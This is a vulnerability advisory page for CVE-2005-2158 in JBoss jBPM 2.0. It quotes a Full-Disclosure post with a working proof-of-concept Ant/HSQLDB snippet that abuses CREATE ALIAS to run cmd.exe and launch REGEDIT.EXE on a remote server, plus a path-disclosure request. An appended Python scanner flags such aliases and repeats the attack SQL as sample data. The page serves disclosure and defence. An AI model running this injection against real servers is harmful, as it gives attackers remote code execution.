SecurityTracker.com
SecurityTracker Archives

Category: Application (Web Server/CGI) > Red Hat JBoss jBPM
Vendors: JBoss Group
JBoss jBPM Lets Remote Users Execute Arbitrary Applications and Obtain System Information
SecurityTracker Alert ID:  1014370
SecurityTracker URL:  http://securitytracker.com/id/1014370
CVE Reference: CVE-2005-2158
Updated:  Jul 7 2005
Original Entry Date:  Jul 3 2005
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Vendor Confirmed:  Yes  
Version(s): 2.0
Description:   Two vulnerabilities were reported in JBoss jBPM. A remote user can execute arbitrary applications on the target system. A remote user can obtain system information.

The HSQLDB support contains a flaw that allows a remote user to execute arbitrary applications on the target system. The application will run with the privileges of the JBoss process.

A remote user can submit a specially crafted HTTP request to cause the jBPM process to disclose the installation path or other system information. The flaw resides in the 'org.jboss.web.WebServer' class. A demonstration exploit request is provided:

GET %.

The underlying vulnerabilities existed in JBoss but have been corrected.

The vendor was notified on June 22, 2005.

Marc Schoenefeld reported these vulnerabilities.

Impact:   A remote user can execute arbitrary applications on the target system with the privileges of the JBoss process.

A remote user can obtain system information, such as the installation path and system version.

Solution:   No solution was available at the time of this entry.

The vendor plans to issue a fix in version 2.0.1.

Vendor URL: www.jboss.org/products/jbpm
Cause:   Access control error
Underlying OS:  Java, Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] JBoss jBPM 2.0: Remote code execution and


Security Advisory: jBPM 2.0
Date:  06/22/05
URL: http://www.illegalaccess.org/java/jbpm.php

" JBoss jBPM is a flexible, extensible workflow management system."
[jbpm.org]

Problem 1: Remote code execution possible with jBPM.
This allows an attacker to trigger an arbitrary executable on the jBPM/JBoss host with the access control rights of the JBoss process. The example triggers REGEDIT.EXE.

Due to a known vulnerability in the underlying JBoss 3.2.x and its embedded HSQLDB, the jBPM system is vulnerable to remote code execution. This is a regression bug from the default installation of JBoss 3.2.1. It was fixed in JBoss 3.2.2. Visit http://www.illegalaccess.org/java/jboss.php for more info.
The following ant file snippet demonstrates the problem by calling regedit on the JBoss host machine running on JDK 1.4.2. For JDK 1.5.0 the names of the exploited classes have to be modified slightly.

<target name="cmdinject">
  <sql
    classpath="hsqldb.jar"
    driver="org.hsqldb.jdbcDriver"
    url="jdbc:hsqldb:hsql://${host}:${port}"
    userid="sa"
    password=""
    print="true"
    >
CREATE ALIAS COMPDEBUG FOR "org.apache.xml.utils.synthetic.JavaUtils.setDebug"
CREATE ALIAS SETPROP FOR "java.lang.System.setProperty";
CREATE ALIAS COMPILE FOR "org.apache.xml.utils.synthetic.JavaUtils.JDKcompile";

CALL COMPDEBUG(true);
CALL SETPROP('org.apache.xml.utils.synthetic.javac','cmd.exe');
CALL COMPILE('/c REGEDIT.EXE','');
  </sql>
</target>

Result: REGEDIT.EXE pops up and the following info is printed on the console when running ant with the build.xml above.
>>ant
>>Buildfile: build.xml
>>
>> cmdinject:
>>       [sql] Executing commands
>>       [sql] 0 rows affected
>>       [sql] 0 rows affected
>>
>>       [sql] null
>>
>>       [sql] 0 rows affected
>>
>>       [sql] null
>>
>>       [sql] 0 rows affected
>>
>>       [sql] true
>>
>>       [sql] 0 rows affected
>>       [sql] 5 of 5 SQL statements executed successfully
>>
>> BUILD SUCCESSFUL
>> Total time: 3 seconds


Problem 2: JBoss class loader covert channel
The default installation of jBPM reveals the path of the installation directory and allows fingerprinting of the server software version by an unauthenticated HTTP request. This is due to an information leak bug in the org.jboss.web.WebServer class of the bundled JBoss container 3.2.5 that creates a covert channel between the webserver and the class loader.
When confronted with an expected HTTP request such as 'GET %.' the org.jboss.web.WebServer class reveals system platform information useful for an attacker. Due to the classloader architecture the RMI class download service on port 8083 also allows an attacker to fingerprint the version of the JBoss server.

- Example 2a (Installation path disclosure): [same as previous bugtraq posting on JBoss published on Jun 18 2005]
- Example 2b (Config file download): [same as previous bugtraq posting on JBoss published on Jun 18 2005]
- Example 2c (Login config and database credential disclosure): [same as previous bugtraq posting on JBoss published on Jun 18 2005]

Workaround:
The jBPM team was contacted on 6/22/05 and will fix the configuration bugs in jBPM 2.0.1.
It should be noted that every JBoss based system is vulnerable to the Problem 2 issue when it uses the service on port 8083. Of course, every JBoss system that has the port 1701 open for HSQLDB is vulnerable to the Problem 2 issue.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
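As an added defensive illustration (not part of the advisory above or of SecurityTracker's entry), a small Python scanner that flags HSQLDB CREATE ALIAS statements binding SQL functions to Java static methods outside an allowlist, which is the mechanism Problem 1 depends on. The allowlist and the dangerous-prefix list are assumptions to be tailored to a real deployment; the sample SQL is constructed from the statements quoted in the advisory.

```python
import re

# The HSQLDB statement the advisory relies on: CREATE ALIAS <name> FOR "<java.static.Method>".
# \s+ also spans line breaks, so a statement wrapped across lines is still caught.
ALIAS_RE = re.compile(r'CREATE\s+ALIAS\s+(?P<alias>\w+)\s+FOR\s+"(?P<target>[\w.$]+)"', re.IGNORECASE)

# Assumed allowlist of static methods an application may legitimately expose as SQL functions.
ALLOWED_TARGETS = {"java.lang.Math.abs", "java.lang.Math.max"}

# Assumed denylist: process/property control, reflection, and the compiler hook abused in the advisory.
DANGEROUS_PREFIXES = (
    "java.lang.System.",
    "java.lang.Runtime.",
    "java.lang.reflect.",
    "org.apache.xml.utils.synthetic.",
)


def classify_alias(target):
    """Classify the Java target of a CREATE ALIAS as 'allowed', 'dangerous' or 'unknown'."""
    if target in ALLOWED_TARGETS:
        return "allowed"
    if target.startswith(DANGEROUS_PREFIXES):
        return "dangerous"
    return "unknown"


def scan_sql(sql_text):
    """Return (alias, target, verdict) for every CREATE ALIAS in a SQL script or statement log."""
    return [
        (m.group("alias"), m.group("target"), classify_alias(m.group("target")))
        for m in ALIAS_RE.finditer(sql_text)
    ]


# Constructed sample: the three aliases from the advisory (first one wrapped, as posted) plus a benign alias.
SAMPLE_SQL = """
CREATE ALIAS COMPDEBUG FOR
"org.apache.xml.utils.synthetic.JavaUtils.setDebug"
CREATE ALIAS SETPROP FOR "java.lang.System.setProperty";
CREATE ALIAS COMPILE FOR "org.apache.xml.utils.synthetic.JavaUtils.JDKcompile";
CREATE ALIAS ABS FOR "java.lang.Math.abs";
CALL SETPROP('org.apache.xml.utils.synthetic.javac','cmd.exe');
"""

if __name__ == "__main__":
    for alias, target, verdict in scan_sql(SAMPLE_SQL):
        print(f"{verdict:9} {alias} -> {target}")
```

Run it over HSQLDB server logs or the SQL a deployment ships; any "dangerous" or "unknown" verdict is worth a look, and the HSQLDB listener (port 1701 in the advisory) should not be reachable from the network at all.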

Copyright 2021, SecurityGlobal.net LLC